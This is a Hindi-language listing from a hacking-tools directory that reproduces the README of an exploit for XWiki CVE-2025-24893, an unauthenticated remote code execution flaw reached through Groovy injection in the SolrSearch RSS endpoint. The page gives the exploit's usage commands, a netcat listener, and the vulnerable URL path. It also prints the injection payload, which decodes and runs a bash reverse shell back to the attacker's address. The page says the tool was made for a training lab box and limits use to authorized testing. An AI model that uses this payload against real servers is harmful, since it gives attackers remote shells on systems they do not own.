Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/tomkingori/xwiki-cve-2025-24893-exploit
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubtomkingori/xwiki-cve-2025-24893-exploit

xwiki-cve-2025-24893-exploit

XWiki CVE-2025-24893 के लिए Groovy स्क्रिप्ट इंजेक्शन के माध्यम से बिना प्रमाणीकरण वाला RCE एक्सप्लॉइट

रिपॉजिटरी देखें
18 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

XWiki CVE-2025-24893 एक्सप्लॉइट

CVE-2025-24893 के लिए संवेदनशील XWiki संस्करणों के लिए बिना प्रमाणीकरण के रिमोट कोड निष्पादन एक्सप्लॉइट।

भेद्यता अवलोकन

15.10.9 से पहले के XWiki संस्करण SolrSearch RSS फ़ीड हैंडलर में Groovy स्क्रिप्ट इंजेक्शन के माध्यम से बिना प्रमाणीकरण के RCE के लिए संवेदनशील हैं। यह भेद्यता इसलिए मौजूद है क्योंकि XWiki text पैरामीटर में उपयोगकर्ता इनपुट को ठीक से सैनिटाइज़ करने में विफल रहता है, जिससे हमलावर RSS संदर्भ से बाहर निकलकर मनमाना Groovy कोड इंजेक्ट कर सकते हैं।

CVE आईडी: CVE-2025-24893
CVSS स्कोर: 9.8 (क्रिटिकल)
प्रभावित संस्करण: XWiki < 15.10.9

विशेषताएँ

  • सरल कमांड-लाइन इंटरफ़ेस
  • स्वचालित पेलोड निर्माण और एन्कोडिंग
  • बुनियादी फ़िल्टर को बायपास करने के लिए Base64-एन्कोडेड रिवर्स शेल
  • न्यूनतम निर्भरताएँ (केवल requests लाइब्रेरी)

आवश्यकताएँ

pip3 install requests

उपयोग

python3 exploit.py <target_url> <attacker_ip> <listener_port>

उदाहरण:

# Start listener on attacker machine
nc -lvnp 9001

# Run exploit
python3 exploit.py http://10.10.11.80:8080 10.10.14.5 9001

यह कैसे काम करता है

  1. bash रिवर्स शेल कमांड तैयार करता है
  2. पेलोड को Base64 में एन्कोड करता है
  3. टेम्पलेट इंजेक्शन (}}}}}}{{{{groovy}}}}) का उपयोग करके इसे Groovy कोड में लपेटता है
  4. आवश्यक डिलीमीटर को बनाए रखते हुए पेलोड को URL एन्कोड करता है
  5. /xwiki/bin/get/Main/SolrSearch?media=rss&text=<payload> पर GET अनुरोध भेजता है
  6. XWiki दुर्भावनापूर्ण RSS फ़ीड को प्रोसेस करता है और Groovy कोड निष्पादित करता है

प्रूफ ऑफ कॉन्सेप्ट

एक्सप्लॉइट निम्नलिखित एंडपॉइंट को लक्षित करता है:

/xwiki/bin/get/Main/SolrSearch?media=rss&text=

यह भेद्यता RSS फ़ीड संदर्भ से बाहर निकलने की अनुमति देती है:

}}}}}}{{{{async async=false}}}}{{{{groovy}}}}
"bash -c {echo,<base64_payload>}|{base64,-d}|{bash,-i}".execute()
{{{{/groovy}}}}{{{{/async}}}}

अस्वीकरण

यह टूल केवल शैक्षिक और अधिकृत पैठ परीक्षण (penetration testing) उद्देश्यों के लिए है। लेखक इस प्रोग्राम के किसी भी दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं है। इस एक्सप्लॉइट का उपयोग केवल उन्हीं सिस्टमों पर करें जिनके आप स्वामी हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है।

संदर्भ

  • XWiki सुरक्षा सलाह
  • CVE-2025-24893

लाइसेंस

MIT लाइसेंस - विवरण के लिए LICENSE फ़ाइल देखें

लेखक

HTB बॉक्स "Editor" के लिए बनाया गया


नोट: किसी भी सिस्टम का परीक्षण करने से पहले हमेशा सुनिश्चित करें कि आपके पास उचित अधिकार है।

टूल डाउनलोड करें